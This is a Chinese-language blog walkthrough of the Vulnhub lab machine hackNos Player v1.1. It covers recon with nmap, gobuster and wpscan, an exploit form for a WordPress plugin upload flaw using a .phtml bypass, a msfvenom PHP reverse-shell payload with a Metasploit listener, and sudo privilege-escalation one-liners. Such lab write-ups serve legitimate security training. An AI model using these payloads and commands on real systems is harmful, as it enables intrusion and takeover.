Vulnhub靶机:HACKNOS_ PLAYER V1.1

最新推荐文章于 2024-01-28 12:50:46 发布
最新推荐文章于 2024-01-28 12:50:46 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 靶机 文章标签: Vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/122902231
版权

目录

介绍

系列: hackNos(此系列共7台)
发布日期:2020年04月10日
难度:初级-中级
Flag : 1个,根用户的root.txt
学习:

  • wordpress 安全测试
  • 远程代码执行
  • 特权提升

靶机地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/

信息收集

主机发现

arp-scan主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。
在这里插入图片描述

主机信息探测

  1. 开放端口探测:nmap -p- 192.168.1.117,只开放了80和3306端口(快速确认开放端口)

在这里插入图片描述

  1. 对开放端口服务做进一步探测:nmap -p80,3306 -sV 192.168.1.117

在这里插入图片描述

  1. 使用默认的NSE脚本进行扫描:nmap -p3306 -sC 192.168.1.117

看到数据库版本是5.5.5
在这里插入图片描述

网站探测

访问80端口,没什么有价值的信息。
在这里插入图片描述

目录扫描

gobuster dir -u http://192.168.1.117/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100

在这里插入图片描述

没发现什么有价值的信息,换用之前的文章 HACLABS: NO_NAME 中的套路(换用大字典)的方式依然无效。木得办法,回过头来看看网站首页吧,能不能看到什么有价值的东西。发现了一个网站目录:“g@web”
在这里插入图片描述

由于需要加载google站点的api,打开速度略慢。耐心等待一会后看到了如下网站。通过插件得知网站是WordPress 5.3.11
在这里插入图片描述

wpscan列出站点的用户名、账号

wpscan --url http://192.168.1.117/g@web -e u --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

发现了一条信息
在这里插入图片描述

打开网站,这个应该是个密码:hackNos@9012!!
在这里插入图片描述

尝试登录网站,失败
在这里插入图片描述

wpscan漏扫网站

wpscan --url http://192.168.1.117/g@web/ -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

发现远程代码执行漏洞!
在这里插入图片描述

打开根据提供的网址,看到了利用代码
在这里插入图片描述

复制下来,对url地址略作修改,得到:

<form method="post" enctype="multipart/form-data" action="http://192.168.1.117/g@web/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>

After doing this, an uploaded file can be accessed at, say:

http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml

将其保存为本地的一个html文件,然后用浏览器打开它,如下图,是一个文件上传
在这里插入图片描述

这就好说了,一句话木马来了😎

Getshell

由于webshell管理工具的字体大小、背景颜色不便于截图展示,所以我这里还是用msf来做吧。

  1. msf准备
生成后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.118 LPORT=4444 x> shell.php

开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST  192.168.1.118
exploit
  1. 投递后门,失败了

在这里插入图片描述

看到提示,文件格式不支持!自己真是大意了,回过头在漏洞验证网站中得知,漏洞的成因为使用了switch case简单匹配了黑名单后缀导致可进行绕过,漏洞验证网站建议我们使用.phtml后缀绕过

  1. 修改后门后缀为.phtml,重新投递文件

在这里插入图片描述

  1. 访问后门

根据利用代码得知,上传的文件在:http://example.com/wp-content/uploads/wpsp
在这里插入图片描述

  1. 获取shell

鼠标单击文件,获取shell
在这里插入图片描述

提权

前面使用wpscan拿到了密码:**hackNos@9012!! **,依次尝试,得知是 **security **用户的
在这里插入图片描述

发现一个敏感文件,暂时没有访问权限
在这里插入图片描述

sudo提权

  1. 第一次sudo提权

提示可以通过用户hacknos进行find提权,而靶机上只有hackNos-boat、hunter、security三个用户,因此这里的用户hacknos指的应该是hackNos-boat
在这里插入图片描述

如下图,切换用户hacknos失败,切换hackNos-boat成功
通过网站 https://gtfobins.github.io/gtfobins/find/ 获知提权命令:

sudo -u hackNos-boat find . -exec /bin/bash \; -quit

在这里插入图片描述

  1. 第二次sudo提权

继续尝试sudo提权,发现ruby提权,通过网站 https://gtfobins.github.io/gtfobins/ruby/ 得知提权命令:

sudo -u hunter ruby -e 'exec "/bin/sh"'

在这里插入图片描述

  1. 第三次sudo提权

在这里插入图片描述

获取所有Flag

在这里插入图片描述

lainwith
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
hackNos: Player v1.1靶机渗透
siaowei44的博客
07-26 484
概述 该靶机 下载地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/ 准备事项:在vulnhub下载的靶机很多时候都无法获得ip地址,这个问题困扰我很久,今天我探寻到一个有效的解决办法https://blog.csdn.net/asstart/article/details/103433065?utm_source=app ip地址 操作系统 靶机 192.168.74.198 Ubuntu 攻击主机 .
Vulnhubplayer-v1.1渗透测试
Bird&Bird
03-31 306
目录1、靶机概述2、信息收集3、获取shell4、提权获取高权限用户获取root权限 1、靶机概述 Difficulty: Intermediate Learning: Web Application | Enumerate | Good Enumeration | Privilege Escalation Overview: Tested: VirtualBox/VMWare Virtual Machine: - Format: Virtual Machine Virtualbox OVA Network
Vulnhub:Player-v1.1靶机
qq_43884092的博客
02-06 65
访问80端口发现存在一个目录,wpscan扫描发现存在一个插件,和一个用户:`wp-local`,该插件存在越权,
一次vulnhub靶机渗透 | Player
PeterWuu的博客
04-19 343
算是一个很适合基础选手打的靶机,考察基础知识稍多,拓展思路。好了,开始渗透起来吧! 靶机下载地址:https://www.vulnhub.com/entry/hacknos-player,459/ 第一步:网络配置 该靶机可能会存在无法自动分配IP的情况,所以无法扫描到的情况下需要手动配置获取IP地址 1.首先开机后显示linux系统信息后,按e进入此界面修改指定内容为rw signie init...
【网安神器篇】——WPScan漏洞扫描工具
最新发布
Innocence_0的博客
01-28 1680
Wordpress作为三大建站模板之一,在全世界范围内有大量的用户,特别是学校网站非常爱用,这也导致白帽子都会去跟踪WordPress的安全漏洞,Wordpress自诞生起也出现了很多漏洞。Wordpress还可以使用插件主题。于是Wordpress本身很难挖掘什么安全问题的时候,安全研究者开始研究其插件、主题的漏洞。通过插件,主题的漏洞去渗透Wordpress站点,于是WPScan应运而生,收集Wordpress的各种漏洞,形成一个Wordpress专用扫描器WPScan是Kali Linux默认自带。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
wp-vulnerability-check:通过API来检查WPScan漏洞数据库的命令行,以识别已安装的WordPress插件的安全性问题
01-30
WordPress漏洞检查(wp-vulnerability-check) WordPress漏洞检查(wp-vulnerability-check)是一个控制台应用程序,可通过API检查WPScan漏洞数据库,以识别已安装的WordPress插件的安全性问题。 如果您将WordPress用作应用程序的一部分,并且使用第三方WordPress插件来实现您的业务逻辑,则可以在CI管道上运行wp-vulnerability-check来检查漏洞。 您应该从获得令牌以访问API。 目录 如何使用 要求 wp-vulnerability-check需要PHP 5.6.0或更高版本。 安装 它可以作为独立工具安装,也可以在CI管道上用作测试步骤。 composer require umutphp/wp-vulnerability-check CLI选项 成功安装后,可以显示以下选项; ./wp-vulnerability-check --help --------------------------- WP Vulnerability Check version 0.2.2 -----
wpscan常见的使用方法
记录学习,一起进步
02-16 2071
wpscan常见的使用方法
wpscan获取免费的API及用法
星空下de青铜
07-10 7838
wpscan 扫描的时候提示没有api 所以扫不到有漏洞的插件 [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up ...
kali中wpscan工具使用
y995zq的博客
01-10 2266
wpscan
【漏扫工具】WPscan简介、下载、更新漏洞库、用法
05-15 6761
【漏扫】WPscan
WPScan基本使用
LYJ20010728的博客
08-05 1995
WPScan基本使用WPScan 简介WPScan 参数WPScan 扫描指定站点WPScan 扫描指定用户WPScan 扫描插件漏洞WPScan 扫描主题漏洞WPScan 更新数据漏洞库WPScan 暴力破解得到密码WPScan TimThumbs文件漏洞扫描WordPress 防护措施 WPScan 简介 WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞,最新版本
wpscan工具简介与使用
永远是少年
12-29 2804
今天继续给大家介绍渗透测试相关知识,本文主要内容是wpscan工具简介与使用。 一、wpscan工具简介 二、wpscan工具使用
[工具使用]WpScan
热门推荐
网络安全知识分享
09-01 1万+
WpScan概述主要参数工具使用扫描wordpress站点插件扫描扫描插件漏洞扫描主题扫描主题漏洞枚举wordpress用户名暴力破解密码结合MSF获取shell 不存在十全十美的文章,如同不存在彻头彻尾的绝望。 ——《且听风吟》村上春树 概述 WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值